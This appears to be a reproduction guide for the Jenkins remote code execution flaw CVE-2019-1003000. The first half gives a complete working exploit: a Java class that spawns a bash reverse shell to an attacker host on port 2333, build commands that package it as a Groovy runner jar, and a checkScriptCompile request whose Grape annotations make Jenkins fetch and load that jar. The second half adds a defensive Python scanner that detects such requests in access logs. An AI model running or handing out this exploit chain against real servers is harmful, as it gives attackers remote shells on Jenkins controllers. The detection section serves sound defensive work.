Jenkins RCE (CVE-2019-1003000) reproduction

Preface: for the vulnerability details, just search the CVE number; this post goes straight to reproducing it.

1. Build a jar that spawns a reverse bash shell and host it on a public server so it can be fetched remotely. Save the following code as jkrce.java:

public class jkrce {
  // The constructor runs when Groovy instantiates the registered runner class.
  public jkrce() {
    try {
      String payload = "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1";
      String[] cmds = { "/bin/bash", "-c", payload };
      java.lang.Runtime.getRuntime().exec(cmds);
    } catch (Exception e) {
      // errors are deliberately ignored
    }
  }
}

2. Create the directory META-INF/services/, compile the class, and write the jkrce class name into META-INF/services/org.codehaus.groovy.plugins.Runners, as follows:

javac jkrce.java                                                       # compile
mkdir -p META-INF/services/                                            # create the directory
echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners     # register the class under META-INF
jar cvf jenkins-1.jar ./                                               # package into a jar

3. On the public server, create the path /tools/jenkins/1/

mkdir -p /home/wwwroot/default/tools/jenkins/1/    # created under the lnmp web root; the path must be exactly this (you can of course change the details in the PoC to use a different path)

4. In the PoC, replace xxx.xxx.xxx.xxx with the public address; nothing else needs to be filled in.

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport jkrce;

Wait for the reverse shell to connect; on success the web page returns the following:

{"column":0,"line":0,"message":"","status":"success"}
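From the defender's side, the request shape in step 4 is the thing to hunt for: a hit on the checkScriptCompile form-validation endpoint of CpsFlowDefinition whose value parameter carries Grape annotations (@GrabConfig, @GrabResolver, @Grab), which make the Groovy compiler fetch and load a jar from an attacker-chosen resolver. The following is an added example, not code from the original post; it parses constructed combined-format access-log lines (assuming Jenkins sits behind a reverse proxy that writes such logs, and using the documentation address 203.0.113.10 as the resolver host) and reports which requests hit the endpoint, which of them carry Grape annotations, and the resolver root they point at.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint used by the PoC above: the "check script compile" form-validation method of
# CpsFlowDefinition, which compiled user-supplied Groovy outside the sandbox.
SCRIPT_COMPILE_ENDPOINT = "checkScriptCompile"

# Grape annotations that cause the Groovy compiler to resolve and load a remote jar.
GRAPE_RE = re.compile(r"@Grab(?:Resolver|Config)?\b")
RESOLVER_ROOT_RE = re.compile(r"""@GrabResolver\([^)]*root\s*=\s*['"]([^'"]+)['"]""")

# Combined-format access-log line: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic); 203.0.113.10 is a documentation address.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2019:10:00:01 +0000] "GET /job/build/ HTTP/1.1" 200 5123
10.0.0.9 - - [01/Mar/2019:10:00:02 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://203.0.113.10/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport%20jkrce; HTTP/1.1" 200 57
10.0.0.7 - - [01/Mar/2019:10:00:03 +0000] "GET /descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=println%20%22hello%22 HTTP/1.1" 200 57
"""


def analyze_line(line):
    """Return a finding dict for a checkScriptCompile request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/" + SCRIPT_COMPILE_ENDPOINT):
        return None
    # parse_qs percent-decodes the script, so %0a becomes a newline and %27 a quote.
    script = parse_qs(parts.query).get("value", [""])[0]
    annotations = GRAPE_RE.findall(script)
    root = RESOLVER_ROOT_RE.search(script)
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "path": parts.path,
        "grape_annotations": annotations,
        "resolver_root": root.group(1) if root else None,
        # Any hit on the endpoint is worth knowing about; Grape usage is the high-risk case.
        "severity": "high" if annotations else "info",
    }


def scan_log(text):
    """Scan a whole log and return the findings in order of appearance."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["src"], f["path"], f["resolver_root"])
```

The resolver root is the most useful field to pivot on: it names the host the compromised controller will try to fetch the jar from, so it can be fed to egress logs or a proxy blocklist. Requests that reach the endpoint without Grape annotations are reported at "info" level because, on an unpatched instance, the endpoint itself is reachable without authorization; the real fix is the Jenkins security update, with a detection like this as a backstop.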